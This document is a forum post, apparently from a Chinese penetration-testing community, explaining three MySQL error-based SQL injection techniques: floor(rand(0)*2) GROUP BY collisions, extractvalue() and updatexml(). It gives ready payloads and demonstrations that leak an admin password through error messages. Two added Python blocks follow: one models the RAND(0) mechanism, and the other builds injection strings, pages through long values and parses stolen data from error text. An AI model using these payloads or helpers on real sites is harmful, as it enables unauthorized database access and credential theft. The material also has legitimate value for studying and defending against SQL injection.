中国网络渗透测试联盟

Title: Three error-based techniques for MySQL injection

Author: admin    Posted: 2012-12-10 10:28

Posting some old notes here. When MySQL fails to execute a statement it throws an error message, and sites built on PHP+MySQL very often print that error text straight onto the page. Where that is the case, each of the three constructions below can be used to read specific data back out of the database through the error message.
Test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));

Both rely on the same behaviour: rand(0) is a fixed sequence (floor(rand(0)*2) yields 0,1,1,0,1,1,...), and MySQL evaluates the GROUP BY key expression a second time when it inserts a new group into its temporary table, so with at least three source rows an insert collides with a key that is already present and MySQL raises "Duplicate entry". information_schema.tables supplies those rows in the first form; in the second, the union of 1, NULL and !1 (which is 0) supplies exactly three.
Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked. To query other data, replace version() with the expression whose value you want; note that the trailing digit of the duplicate entry is the floor(rand(0)*2) value, not part of the data.
For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
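As an added illustration (this code is not part of the original post), the following Python models the two MySQL behaviours the floor() technique depends on: the deterministic RAND(0) sequence, reproduced from the my_rnd() linear congruential generator and the seeding in Item_func_rand::seed_random() in MySQL's source, and the GROUP BY temporary table evaluating its key expression a second time when it inserts a new group. Calling simulate_group_by() with the version string from the error above reproduces the exact duplicate key MySQL reported, and shows that with fewer than three source rows no collision occurs. The model is a simplification that covers only the lookup/insert behaviour relevant here.

```python
# Added example: model of the MySQL behaviour behind the floor(rand(0)*2)
# GROUP BY error. Not taken from the original post.

MAX_VALUE = 0x3FFFFFFF  # rand_struct.max_value in MySQL's my_rnd()


def mysql_rand(seed):
    """Generator reproducing MySQL's RAND(seed): seeds derived as in
    Item_func_rand::seed_random(), values as in my_rnd() (a tiny LCG)."""
    seed &= 0xFFFFFFFF
    seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
    seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE


def floor_rand_sequence(seed, n):
    """First n values of floor(rand(seed)*2)."""
    gen = mysql_rand(seed)
    return [int(next(gen) * 2) for _ in range(n)]


def simulate_group_by(prefix, row_count, seed=0):
    """Model the temporary table MySQL builds for
         select count(*), concat(<prefix>, floor(rand(seed)*2)) x ... group by x
    over row_count source rows. The key expression is evaluated once to look
    the group up and, if the group does not exist yet, once more to produce
    the key that is actually inserted. Returns the colliding key (what MySQL
    prints as "Duplicate entry '...'") or None if no error would occur."""
    gen = mysql_rand(seed)

    def key():
        return prefix + str(int(next(gen) * 2))

    groups = {}
    for _ in range(row_count):
        lookup = key()               # first evaluation: find the group
        if lookup in groups:
            groups[lookup] += 1      # existing group: count(*) increments
            continue
        inserted = key()             # second evaluation for the new row
        if inserted in groups:
            return inserted          # ERROR 1062 Duplicate entry
        groups[inserted] = 1
    return None


if __name__ == "__main__":
    print(floor_rand_sequence(0, 10))
    print(simulate_group_by("5.1.33-community-log", 3))
    print(simulate_group_by("5.1.33-community-log", 2))
```

With three rows the trace is: row 1 looks up "...0", finds nothing and inserts "...1"; row 2 looks up "...1" and finds it; row 3 looks up "...0", finds nothing and tries to insert "...1" again, which is the duplicate MySQL complains about. This is also why the payload must scan a table with at least three rows.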
2. ExtractValue

Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

0x5c is a backslash, which is not valid at that position in an XPath expression, so extractvalue() rejects the whole concatenated string and quotes it in the error message. The message only echoes the first 32 characters, so longer values have to be read in pieces with substr().

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test payload:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

0x5e24 is the two characters ^$, placed on both sides of the value so it is easy to pick out of the message; the same 32-character limit on the echoed string applies.

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
That's all. Thanks, foreign guys.
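A further added example, not from the original post: small Python helpers for driving the three channels from a script. floor_payload() and xpath_payload() only build the injection strings (the table and column names they embed are whatever expression you pass in), and the two parsers recover the leaked value from the error text. The sample messages are constructed copies of the errors shown in this post; the 0x7e (~) delimiter and the 31-character substr() window in xpath_payload() are choices made here, because the XPath error quotes at most 32 characters and one of them is taken by the delimiter.

```python
# Added example: payload builders and error parsers for the three
# error-based channels described above. Not taken from the original post.
import re

# Error formats as printed by the mysql client (and echoed by a PHP page).
DUP_RE = re.compile(r"Duplicate entry '(.*)' for key 'group_key'")
XPATH_RE = re.compile(r"XPATH syntax error: '(.*)'\s*$")

# Constructed sample errors, copied from the messages shown in the post.
SAMPLE_ERRORS = {
    "floor": "ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'",
    "extractvalue": "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    "updatexml": "ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'",
}


def floor_payload(expr):
    """GROUP BY / floor(rand(0)*2) variant; expr is any scalar SQL expression.
    information_schema.tables provides the >= 3 rows the trick needs."""
    return ("and (select 1 from (select count(*),concat((%s),floor(rand(0)*2))x "
            "from information_schema.tables group by x)a)" % expr)


def xpath_payload(expr, offset=1, length=31, func="updatexml", delim="0x7e"):
    """extractvalue()/updatexml() variant. The XPath error echoes at most 32
    characters, so one delimiter plus a 31-character substr() window is read
    per request; raise offset by 31 to page through a longer value."""
    inner = "concat(%s,substr((%s),%d,%d))" % (delim, expr, offset, length)
    if func == "updatexml":
        return "and updatexml(1,%s,1)" % inner
    return "and extractvalue(1,%s)" % inner


def parse_floor_error(msg):
    """Return the leaked value from a Duplicate entry message, dropping the
    trailing floor(rand(0)*2) digit that is concatenated onto it."""
    m = DUP_RE.search(msg)
    if not m:
        return None
    return m.group(1)[:-1]


def parse_xpath_error(msg, delim):
    """Return the leaked value from an XPATH syntax error message, removing
    the delimiter the payload placed before (and optionally after) it."""
    m = XPATH_RE.search(msg)
    if not m:
        return None
    value = m.group(1)
    if value.startswith(delim):
        value = value[len(delim):]
    if value.endswith(delim):
        value = value[:-len(delim)]
    return value


def next_offset(chunk, offset, length=31):
    """Offset for the following substr() window, or None once the server
    returned a chunk shorter than the window (end of the value reached)."""
    return offset + length if len(chunk) == length else None


if __name__ == "__main__":
    print(floor_payload("select pass from admin limit 1"))
    print(xpath_payload("select pass from admin limit 1", offset=32))
    print(parse_floor_error(SAMPLE_ERRORS["floor"]))
    print(parse_xpath_error(SAMPLE_ERRORS["extractvalue"], "\\"))
    print(parse_xpath_error(SAMPLE_ERRORS["updatexml"], "^$"))
```

The delimiter passed to parse_xpath_error() is the decoded character string (a backslash for 0x5c, "^$" for 0x5e24), not the hex literal used in the SQL. parse_floor_error() has to strip exactly one character because the floor(rand(0)*2) value is always a single digit appended after the data.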
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2